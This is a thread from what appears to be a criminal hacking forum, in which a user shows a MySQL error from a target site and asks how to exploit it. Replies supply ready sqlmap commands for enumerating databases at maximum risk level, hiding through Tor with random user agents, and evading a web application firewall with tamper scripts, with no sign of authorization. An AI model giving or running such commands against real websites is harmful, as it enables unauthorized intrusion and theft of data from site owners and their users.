JOIN BREACHFORUMS TELEGRAM
Help sql injection and sqlmap this case?
by liampv - Thursday August 15, 2024 at 01:41 PM
MVP User
MVP
Posts: 36
Threads: 3
Joined: Jun 2023
Reputation: 50

MVP
#1
Aug 15, 2024, 01:41 PM
Hi everybody
I'm trying to learn about sql injection and sqlmap.
I tried a website, and saw an error like this? How should I exploit it?
victim.com/search/12'
Error massage:
Query: SELECT * FROM php_order WHERE id='12''
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''12''' at line 1
I tried like this:
sqlmap -u "victim.com/search/12*" --dbs --dbms=mysql
but no result.
Please help me this case
Reply
BreachForums Operative

Posts: 2,403
Threads: 248
Joined: Jun 2023
Reputation: 5,065

Reputation KingBrain WizardActiveService
#2
Aug 15, 2024, 04:07 PM
Can you show the output from such command, try adding verbose with it.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Legend
Reply
M!6

Posts: 552
Threads: 3
Joined: Jul 2023
Reputation: 126
#3
Aug 15, 2024, 05:30 PM
Try this
sqlmap -u "victim.com/search/12'" --level=5 --risk=3 -o --dbs --answer="crack=n" --tor --check-tor --tor-type=socks5 --tor-port=9150 --no-cast --random-agent

And try adding --threads=5 and verbose like Intel mention

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Sale of public leaks + attempted scam and manipulation. Shame. | https://breachforums.rs/Forum-Ban-Appeals if you feel this is incorrect.
Reply
spirits
VIP
Posts: 79
Threads: 10
Joined: Jul 2024
Reputation: 133
#4
Aug 15, 2024, 05:35 PM
(Aug 15, 2024, 01:41 PM)liampv Wrote:
Hi everybody
I'm trying to learn about sql injection and sqlmap.
I tried a website, and saw an error like this? How should I exploit it?
victim.com/search/12'
Error massage:
Query: SELECT * FROM php_order WHERE id='12''
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''12''' at line 1
I tried like this:
sqlmap -u "victim.com/search/12*" --dbs --dbms=mysql
but no result.
Please help me this case

If the error you receive is caused by WAF or you encounter this error after finding the solution, add the following parameter: 

 --tamper="between,randomcase,space2comment"

Good luck / By @rr00ttsec  Cool
https://i.postimg.cc/Kv4Zkxw9/text.gif
Reply
h4x0r
God
Posts: 114
Threads: 26
Joined: Jun 2023
Reputation: 300

GOD
#5
Aug 15, 2024, 06:34 PM
This isn't that easy, every sql server have his own tricks and arguments to use. (except low hanging fruit) Without some details i can't help.

the only thing i can say if you found some entry point use --banner to confirm it isn't a false positive
Website
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Forums and Telegrams channels Databases leak sites j4c1nt0 3,091 188,737 1 hour ago
Last Post: nosiop
  How Hackers Stay COMPLETELY Anonymous [SUPREME GUIDE] GlitchPool 335 9,514 1 hour ago
Last Post: nomadicer
  test PowTest1 0 34 1 hour ago
Last Post: PowTest1
  How to make money with hacking ssrf 1,244 80,673 1 hour ago
Last Post: neymarjr3162
  HACK CCTV Cameras Cracked 23 958 1 hour ago
Last Post: PowTest1

Forum Jump:


 Users browsing this forum: 1 Guest(s)